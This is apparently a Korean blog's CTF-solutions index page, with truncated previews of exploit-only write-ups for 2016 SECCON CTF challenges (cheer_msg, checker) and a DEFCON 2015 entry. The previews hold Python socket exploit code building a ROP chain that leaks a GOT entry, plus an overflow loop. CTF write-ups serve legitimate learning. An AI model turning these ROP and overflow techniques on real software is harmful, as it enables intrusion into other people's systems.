반응형 Security/[게임] CTF 풀이56 [exploit] 2016 SecconCTF - cheer_msg writeups (exploit only) #!/usr/bin/env python import socket import struct import telnetlib p = lambda x: struct.pack( "" ) s.send( "-150\n" ) u_recv( "Message >>" ) pay = p( printf_plt ) pay += p( pppr ) pay += p( 0x804887d ) # \nThank you %s!\nMessage : %s\n pay += p( setbuf_got ) pay += p( setbuf_got ) pay += p( 0x80485ca ) # main s.send( pay+"\n" ) data = u_recv( "Message : " ) data = u_recv( "Message : " ) data = d.. 2016. 12. 11. [exploit] 2016 SecconCTF - checker writeups (exploit only) #!/usr/bin/env python import socket host = 'localhost' host = "checker.pwn.seccon.jp" port = 1120 port = 14726 s = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) s.connect( ( host, port ) ) def u_recv( st ): bf = '' while st not in bf: bf += s.recv( 1 ) return bf print u_recv( "NAME :" ) s.send( "name\n" ); for i in range( 0x180, 0x170, -1 ): u_recv( ">>" ) pay = ("a"*i)+"\n.. 2016. 12. 11. 2015 HUST hacking festival 2015. 6. 1. [coding] DEFCON CTF Qualifier 2015, catwestern Writeups blackcon@bk:~/def/code$nc catwestern_631d7907670909fc4df2defc13f2057c.quals.shallweplayaga.me 9999 ****Initial Register State**** rax=0x408ac14d14c91041 rbx=0x92b94f86512d81f7 rcx=0x27e130edb33ed938 rdx=0x4908d46be209ea22 rsi=0x46544d33f066a612 rdi=0x7917f07f5de389fd r8=0x1be4f02013a8e1bd r9=0xa30f7795d3397ee3 r10=0x2bce7d9563e73db2 r11=0x75aabcc891d0be75 r12=0x65f56eb6f0aea8a0 r13=0xfb79336eaae.. 2015. 5. 18. 이전 1 2 3 4 5 ··· 14 다음